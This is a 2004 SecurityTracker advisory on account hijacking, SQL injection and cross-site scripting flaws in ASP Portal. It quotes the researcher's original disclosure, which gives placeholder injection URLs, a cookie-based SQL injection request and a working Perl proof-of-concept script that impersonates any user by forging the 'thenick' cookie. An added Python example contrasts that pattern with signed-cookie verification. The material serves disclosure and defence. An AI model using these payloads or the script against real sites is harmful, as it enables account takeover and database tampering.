ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1009050
CVE Reference: GENERIC-MAP-NOMATCH
Date: Feb 14 2004
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Description: Manuel Lopez reported several vulnerabilities in ASP Portal. A remote user can inject SQL commands and can hijack user accounts. A remote user can also conduct cross-site scripting attacks.
It is reported that a remote user can modify the value of their 'thenick' cookie to obtain access to a target user's account, including an administrator's account. A demonstration account hijacking exploit is available in the Source Message.
The report also indicates that the 'index.asp' script does not properly validate user-supplied input in the 'pageid' and 'downloadscat' variables. A remote user can reportedly inject SQL commands to be executed by the database. Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc=blog&pageid='[SqlQuery]
http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
It is also reported that a remote user can inject SQL commands via the 'thenick' cookie.
It is also reported that the software does not filter HTML code from user-supplied input before displaying information containing that input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc='>[XSS]
http://[target]/index.asp?inc=profile&searchtext='>[XSS]
http://[target]/index.asp?inc=forumread&article='>[XSS]
It is also reported that a remote user with an account on the system can conduct cross-site scripting attacks by injecting HTML code in place of the image URL ('photograph URL') on the 'details' page.
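The account hijack and the cookie-based SQL injection described above share one root cause: the plain 'thenick' cookie is taken as proof of identity. The Python example below is added here for illustration and is neither the vendor's code nor the reporter's; the cookie format (b64(username).nonce.HMAC), the secret key and the function names are assumptions. It contrasts the trusting pattern with a server-signed cookie whose MAC is verified before the name is used anywhere, so a substituted account name or a quote-laden value is rejected before it can reach a database query.

```python
import base64
import hashlib
import hmac
import secrets

# Assumption: a server-side secret generated at deploy time and never sent to
# clients. Constructed demo value only.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"


def _mac(payload: bytes) -> str:
    return hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()


def vulnerable_current_user(thenick_cookie: str) -> str:
    """The pattern the advisory describes: whoever the cookie names is logged in."""
    return thenick_cookie


def make_session_cookie(username: str) -> str:
    """Issue a 'thenick' value of the form b64(username).nonce.hmac (assumed format).

    The nonce keeps two logins from producing identical cookies; the HMAC ties
    the name to this server's key, so only the server can mint a valid value."""
    name = base64.urlsafe_b64encode(username.encode()).decode()
    payload = f"{name}.{secrets.token_hex(16)}"
    return f"{payload}.{_mac(payload.encode())}"


def current_user(thenick_cookie: str):
    """Return the authenticated username, or None.

    The MAC is checked before the name is decoded or used, so a substituted
    account name or a cookie such as thenick='[SqlQuery] is rejected up front
    and never reaches a query."""
    parts = thenick_cookie.split(".")
    if len(parts) != 3:
        return None
    payload = f"{parts[0]}.{parts[1]}".encode()
    # Constant-time comparison on bytes; non-ASCII input cannot raise here.
    if not hmac.compare_digest(_mac(payload).encode(), parts[2].encode()):
        return None
    try:
        return base64.urlsafe_b64decode(parts[0].encode()).decode()
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    issued = make_session_cookie("alice")
    print(current_user(issued), current_user("Admin"), current_user("'[SqlQuery]"))
```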
Impact: A remote user can hijack a target user's account.
A remote user can inject SQL commands to be executed by the database.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: The vendor has reportedly issued a fixed version.
Also, the January patch is available at:
http://www.aspportal.net/downloadsviewer.asp?theurl=38
Vendor URL: www.aspportal.net/
Cause: Authentication error, Input validation error
Underlying OS: Windows (Any)
Reported By: Manuel Lopez <mantra@gulo.org>
Message History: None.
Source Message Contents
Date: Sat, 14 Feb 2004 06:21:11 +0100
From: Manuel López <mantra@gulo.org>
Subject: ASP Portal Multiple Vulnerabilities
Title: ASP Portal Multiple Vulnerabilities
By: Manuel López
Software: Asp Portal
Vendor Description:
ASP Portal is an ASP-powered portal site which uses an Access database to store all the site info. The script also includes an easy-to-use Admin Interface, so you can change everything you need to online, which makes maintaining the site very easy.
Severity: Moderately critical
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, ID Spoofing.
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Description:
---- Cross-Site Scripting ----
This product is vulnerable to a Cross-Site Scripting vulnerability that would allow attackers to inject HTML and script code into the pages and execute it in the client's browser.
http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]
---- Image ScriptCode Injection ----
An attacker can inject arbitrary HTML or script code instead of an image in the "photograph URL" of the user's 'details' page.
javascript:alert()
---- Sql Injection ----
Another sanitization problem could let an attacker inject SQL code to manipulate and disclose various information from the database. The problem is in the fields 'pageid' and 'downloadscat'.
http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
SQL injection is also possible in the cookie, in the 'thenick' field.
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]
---- Cookie Account Hijack ----
It is possible to impersonate others by manipulating the 'thenick' parameter in the cookie.
By modifying the cookie it is possible to gain access to another account. This issue can be exploited to gain an administrative account with the service.
---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----
#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm
use IO::Socket;

# Usage banner (the braces of this block were lost in extraction and are restored here)
if (@ARGV < 4) {
    print "\n\n";
    print " __________________________________________________________ \n";
    print "|                                                          |\n";
    print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
    print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
    print "|                                                          |\n";
    print "| By: Manuel López #IST                                    |\n";
    print "|__________________________________________________________|\n";
    print "\n\n";
    exit(1);
}

$host       = $ARGV[0];   # target host
$directorio = $ARGV[1];   # path to index.asp on that host
$usuario    = $ARGV[2];   # account name placed in the 'thenick' cookie
$fichero    = $ARGV[3];   # local file that receives the server response

print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
    PeerAddr => "$host", PeerPort => "80") || die "socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
# The empty line before the terminator ends the HTTP headers; Host is required by HTTP/1.1
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Host: $host
Cookie: thenick=$usuario

taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero") or die "open: $!";
print Result while <$socket>;
close Result;
------------------------------------------------
Solution:
Vendor contacted.
The vulnerabilities have reportedly been fixed in the new version.
Download the January patch: http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new version.
---- Credits ----
Manuel López ( mantra@gulo.org ) #IST
Special Thanks: -- Aklis -- gulo.org
Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST staff.
Excuse me for speaking English so badly.